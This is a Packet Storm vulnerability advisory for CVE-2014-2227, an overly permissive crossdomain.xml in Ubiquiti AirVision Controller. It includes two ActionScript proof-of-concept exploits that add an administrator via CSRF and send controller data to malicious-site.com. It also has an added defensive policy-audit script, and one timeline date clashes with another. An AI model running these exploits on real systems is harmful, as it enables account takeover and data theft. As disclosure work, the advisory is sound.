PACKETSTORM:127617

Ubiquiti AirVision Controller 2.1.3 Weak Settings

2014-07-25 00:00:00
Seth Art
packetstormsecurity.com

EPSS: 0.049 (Low), percentile 92.8%

-----------  
Vendor:  
-----------  
Ubiquiti Networks (http://www.ubnt.com/)  
  
----------------------------------------------  
Affected Products/Versions:  
----------------------------------------------  
AirVision Controller v2.1.3  
Note: Previous versions may be affected  
  
-----------------  
Description:  
-----------------  
Title: Overly Permissive default crossdomain.xml file  
CVE: CVE-2014-2227  
CWE: http://cwe.mitre.org/data/definitions/264.html  
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2227.html  
Researcher: Seth Art - @sethsec  
  
------------------------------------------------------------------------------------------------------  
POC #1: Using crossdomain.xml to execute CSRF and add an administrator:  
------------------------------------------------------------------------------------------------------  
  
```actionscript
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github: https://github.com/gursev/flash-xdomain-xploit
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;
    import flash.net.URLRequestHeader;

    public class XDomainXploit3 extends Sprite {
        public function XDomainXploit3() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "https://victim:7443/api/2.0/admin";
            var header:URLRequestHeader = new URLRequestHeader("Content-Type",
                "text/plain; charset=UTF-8");
            var readRequest:URLRequest = new URLRequest(readFrom);
            readRequest.method = URLRequestMethod.POST;
            readRequest.data =
                "{\"name\":\"csrf-cdp\",\"email\":\"[email protected]\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";
            readRequest.requestHeaders.push(header);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php";
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
```
  
-----------------------------------------------------------------------  
POC #2: Using crossdomain.xml to exfiltrate log data:  
-----------------------------------------------------------------------  
  
```actionscript
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github: https://github.com/gursev/flash-xdomain-xploit
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;

    public class XDomainXploit extends Sprite {
        public function XDomainXploit() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "/victim:7443/api/2.0/admin";
            var readRequest:URLRequest = new URLRequest(readFrom);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            var sendTo:String = "http://www.malicious-site.com/admin";
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
```
  
-------------  
Solution:  
-------------  
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:  
The application name changed from AirVision to UniFi Video)  
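As an added defender-side check (not part of the advisory or of Ubiquiti's code), the following Python audits a crossdomain.xml policy for the grants that make the POCs above possible: wildcard domains, `secure="false"`, and wildcard header forwarding. Both sample policies are constructed for illustration.

```python
"""Audit an Adobe crossdomain.xml policy for overly permissive grants.
Added example, not from the advisory; sample policies are constructed."""
import xml.etree.ElementTree as ET

# Constructed sample resembling an overly permissive default policy.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed sample of a tightened policy: only a named host, TLS only.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="video.example.internal"/>
</cross-domain-policy>"""


def audit_crossdomain(policy_xml):
    """Return a list of findings (strings); an empty list means nothing flagged."""
    findings = []
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return ["root element is not <cross-domain-policy>"]
    for sc in root.findall("site-control"):
        if sc.get("permitted-cross-domain-policies") == "all":
            findings.append("site-control permits policy files anywhere on the host")
    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        # A bare '*' or a '*.' prefix grants access to arbitrary origins.
        if domain == "*" or domain.startswith("*."):
            findings.append("allow-access-from grants wildcard domain %r" % domain)
        # secure="false" lets plain-HTTP content read an HTTPS service.
        if el.get("secure", "true").lower() == "false":
            findings.append("allow-access-from %r allows non-TLS callers" % domain)
    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*" or el.get("headers") == "*":
            findings.append("arbitrary request headers accepted cross-domain")
    return findings


if __name__ == "__main__":
    for name, pol in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(name, audit_crossdomain(pol) or ["ok"])
```

Point it at the policy fetched from `https://<controller>:7443/crossdomain.xml` after upgrading to confirm the wildcard grant is gone.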
  
-----------------------------  
Disclosure Timeline:  
-----------------------------  
  
2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product  
2014-02-19: Ubiquiti confirms receipt of AirVision report and existence  
of the vulnerability  
2014-02-28: CVE-2014-2227 assigned  
2014-03-12: Requested status update  
2014-03-27: Requested status update  
2014-04-07: Requested status update  
2014-04-09: Ubiquiti provides timeline for solution  
2014-04-18: UniFi Video 3.0.1 is released  
2014-06-13: Set public disclosure date of 2014-07-24  
2014-07-24: Public disclosure  
  
  